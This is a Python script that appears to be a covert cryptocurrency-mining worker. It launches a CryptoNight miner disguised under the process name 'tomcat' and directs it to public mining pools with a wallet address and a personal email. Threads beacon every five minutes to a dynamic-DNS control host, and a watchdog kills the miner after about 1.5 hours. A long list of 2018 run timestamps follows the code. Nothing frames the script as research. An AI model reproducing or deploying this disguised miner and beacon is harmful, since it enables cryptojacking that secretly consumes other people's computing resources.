import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:15:05.255440
#2018-02-17 17:03:06.170103
#2018-02-17 18:51:05.609889
#2018-02-17 20:41:06.739436
#2018-02-17 22:28:06.142039
#2018-02-18 00:11:06.421892
#2018-02-18 02:02:06.331877
#2018-02-18 03:48:01.387412
#2018-02-18 05:35:02.796583
#2018-02-18 07:28:07.609836
#2018-02-18 09:16:01.565574
#2018-02-18 11:02:07.215668
#2018-02-18 12:48:03.893588
#2018-02-18 14:36:08.040182
#2018-02-18 16:26:03.893448
#2018-02-18 18:14:03.960259
#2018-02-18 20:00:09.953950
#2018-02-18 21:47:06.389478
#2018-02-18 23:35:08.192024
#2018-02-19 01:21:04.855335
#2018-02-19 03:09:06.143341
#2018-02-19 04:54:04.904433
#2018-02-19 06:38:01.920554
#2018-02-19 08:28:01.627595
#2018-02-19 10:17:06.146633
#2018-02-19 12:05:07.273003
#2018-02-19 13:52:09.088677
#2018-02-19 15:40:06.011094
#2018-02-19 17:28:09.018745
#2018-02-19 19:16:09.193389
#2018-02-19 21:05:08.308120
#2018-02-19 22:51:01.470773
#2018-02-20 00:35:06.446992
#2018-02-20 02:24:02.197671
#2018-02-20 04:14:01.808972
#2018-02-20 05:57:05.708617
#2018-02-20 07:43:08.901426
#2018-02-20 09:28:08.322142
#2018-02-20 11:12:06.459896
#2018-02-20 12:59:06.338115
#2018-02-20 14:43:09.082084
#2018-02-20 16:35:09.884274
#2018-02-20 18:22:09.482125
#2018-02-20 20:14:05.959952
#2018-02-20 22:01:04.137631
#2018-02-20 23:42:05.704340
#2018-02-21 01:26:01.632511
#2018-02-21 03:15:09.616225
#2018-02-21 05:04:05.930938
#2018-02-21 06:53:01.999882
#2018-02-21 08:39:07.324530
#2018-02-21 10:25:01.809232
#2018-02-21 12:13:06.747677
#2018-02-21 14:01:04.579963
#2018-02-21 15:45:11.613004
#2018-02-21 17:39:06.602211
#2018-02-21 19:25:08.387630
#2018-02-21 21:14:04.225475
#2018-02-21 23:02:03.605142
#2018-02-22 00:52:05.586982
#2018-02-22 02:39:01.352485
#2018-02-22 04:26:05.630339
#2018-02-22 06:12:01.430942
#2018-02-22 07:58:05.096266
#2018-02-22 09:46:08.235642
#2018-02-22 11:31:07.351925
#2018-02-22 13:17:08.270030
#2018-02-22 15:07:06.945694
#2018-02-22 16:51:01.883789
#2018-02-22 18:40:09.991755
#2018-02-22 20:31:07.240303
#2018-02-22 22:17:06.750438
#2018-02-23 00:03:09.374304
#2018-02-23 01:51:01.272406
#2018-02-23 03:40:05.446971
#2018-02-23 05:25:06.703228
#2018-02-23 07:11:06.047035
#2018-02-23 09:16:02.108894
#2018-02-23 11:23:06.760216
#2018-02-23 13:13:10.492126
#2018-02-23 14:58:08.176878
#2018-02-23 16:47:06.844148
#2018-02-23 18:33:04.000188
#2018-02-23 20:20:01.291486
#2018-02-23 22:07:06.658843
#2018-02-23 23:55:06.179986
#2018-02-24 01:46:02.012457
#2018-02-24 03:37:07.142543
#2018-02-24 05:21:06.366576
#2018-02-24 07:09:03.805618
#2018-02-24 08:58:05.637440
#2018-02-24 10:38:04.897894
#2018-02-24 12:24:06.915774
#2018-02-24 14:18:07.614019
#2018-02-24 16:04:07.544582
#2018-02-24 17:56:07.296892
#2018-02-24 19:43:06.080810
#2018-02-24 21:31:06.198305
#2018-02-25 00:17:04.174286
#2018-02-25 03:27:03.591327
#2018-02-25 07:21:07.713768